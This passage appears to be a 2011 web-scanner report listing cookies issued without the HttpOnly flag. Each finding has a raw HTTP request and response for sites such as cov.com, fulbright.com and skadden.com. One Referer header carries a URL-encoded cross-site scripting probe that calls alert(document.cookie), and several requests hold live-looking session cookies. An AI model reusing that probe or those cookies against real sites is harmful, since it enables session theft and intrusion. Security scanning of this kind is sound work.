udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==
//Vermont-12.4.0-1012 var rsi_now= new Date(); var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /g.lt?nvst=12596&nvtt=z&nvup=1 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: ltcid=547362597; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2013 11:57:37 GMT Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2011 15:57:37 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 17:57:37 GMT Server: lighttpd/1.4.19 Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fca/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sec/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sec/scripts/resize.gif HTTP/1.1 Host: skaddenpractices.skadden.com Proxy-Connection: keep-alive Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630
The following cookie was issued by the application and does not have the HttpOnly flag set:
Coyote-2-a0f0083=a0f022f:0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.cov.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-US/regions/middle_east/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /health_care/health_care_reform/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /industry/financial_services/dodd_frank/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ja-JP/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ko-KR/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/detail.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /zh-CN/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Austin HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Beijing HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A47%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1944%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:47 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Dallas HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1950%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Denver HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /FAA_adv HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D888%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:50:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /HongKong HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2092%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /London HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
